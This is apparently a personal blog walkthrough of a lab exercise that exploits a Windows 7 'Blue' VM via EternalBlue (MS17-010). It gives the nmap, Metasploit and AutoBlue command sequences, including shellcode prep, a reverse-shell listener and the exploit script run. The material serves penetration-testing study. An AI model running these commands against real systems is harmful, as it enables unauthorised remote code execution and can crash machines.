Babs

Posted on May 13

Blue Windows 7 Walkthrough

Ever wondered how far you can push a machine before it breaks? This walkthrough explores unconventional methods to interact with the Blue machine.

The password for the machine is:

user- Password123!

admin- Password456!

The admin password is required to get the machine's IP address.

Using

ipconfig

with administrative login the IP address of the machine is shown. The image below shows mine.

On our kali terminal we run the ping command to verify if our machine is online and can communicate with our kali machine using the command:

ping 192.168.59.133

NB- Make sure to change the IP address to your target's IP address

The packets received shows that the machine is online so we run NMAP scan to discover which ports are open using the command:

nmap -p- -A 192.168.59.133

From the image above port 445 is open and the highlighted part of the image shows that the windows 7 ultimate is SMB related which is known to be vulnerable, so we do a google search to search for "Windows 7 Ultimate 7601 Service Pack 1 exploit"

After much enumeration it seems the exploit for the windows 7 is popularly known as "MS17-010 EternalBlue"

So we turn on metasploit using the command:

msfconsole

And then we input the command:

search eternalblue

You can also try using:

search MS17-010

We need to first confirm if the machine is vulnerable to the exploit and there are two ways we can do this using either auxiliary scanner or the exploit itself.

Using the auxiliary scanner:
From the result gotten after searching for the exploit using metasploit the scanner to be used for this is "auxiliary/scanner/smb/smb_ms17_010" which is Number 24 for me (yours might be different).

So input the command:

 use 24

NB- use whatever number your scanner shows

To view details input the command:

options

Now set rhosts to your target IP address:

set rhosts 192.168.59.133

Input the command to confirm details:

options

Now input the command:

run

It shows us that the host is likely vulnerable to the exploit chosen.

Now we search the exploit again using the command:

search eternalblue

The option we want to use is the "exploit/windows/smb/ms17_010_eternalblue" which for me is option 0, so input the command:

use 0

And then we input the command:

options

Now we set our rhosts to the target's IP address using the command:

set rhosts 192.168.59.133

and

options

to confirm changes.

Now! Input the command:

check

The image shows that the target is vulnerable (This is the second way to scan if the machine is vulnerable to the exploit)

Now to run the exploit, we input the command:

run

exploit

Depending on how cool you want to feel(wink)

THE MACHINE HAS BEEN SUCCESSFULLY EXPLOITED.

MANUAL EXPLOITATION

We start by searching for "eternalblue github" because the exploit I want to use is on github.
From the search results choose the one from 3ndG4me github

Now on kali, move into the /opt/ folder using the command:

cd /opt/

NB- The /opt folder in Kali Linux is for optional add-on software packages. This means it stores software that isn't part of the core Kali system itself.

On the github page, click on code and copy the https link

Now input the command:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

NB- for this exploit make sure you are using root user or you'd experience the error has seen below

Switch to root using:

sudo su root

and then input your root password if it requests for it.

Now re-run the command:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

The command is now successful and an autoblue directory has been created.

Move into the autoblue directory using the command:

cd AutoBlue-MS17-010/

Input the command:

pip install -r requirements.txt

Move into the shellcode directory using the command:

cd shellcode

and then run shell prep using the command:

./shell_prep.sh

Enter y for the question.
Then enter your kali IP address(That is your local host known as lhost)
Enter a port number you know is free for x64, for me I'm using 9999

And enter another port number for x86, for me I'm using 2222

For the shell I want to use a regular cmd shell because I already used a meterpreter shell for the msfconsole exploit, so using either one will work, but I'm using the cmd

So input the command:

And for the payload input the command:

to select the staged payload.
(the staged or stageless payload should work but for me I'm using the staged)

Now that is done we need to go back and execute listener
We go back by inputting the command:

cd ..

Now input the command:

./listener_prep.sh

NB- The command above is running a listener for us in metasploit.

So now we fill the details as we filled them before by inputting the same details for the lhost,ports, regular cmd and staged payload.

Now all that's left is for us to run the exploit.
For that open a new tab by clicking on file and then new tab to open a new tab.

On the new tab, switch to root, move to /opt/ and then cd into autoblue directory

Now! Run the command:

python eternalblue_exploit7.py 192.168.59.133 shellcode/sc_all.bin

NB- Change the IP address to your blue machine IP address.

The image below shows the blue machine before running the exploit:

The image below shows the blue machine after running the exploit:

The image below shows kali's output:

The exploit was successful and also ended up crashing the system.

This is a perfect example of why when running a penetration test, you need to keep the people or organisation informed before running an exploit because you could have tipped over an important machine that's being used.

SOME CHALLENGES YOU MIGHT FACE WHEN DOING THIS LAB EXPERIMENT

If your machine ends up showing up like it did in the image above, you will need to delete it and reinstall the machine.
Once you've done that, login with the administrator password and get your IP address and then log out and stay on the page as seen below: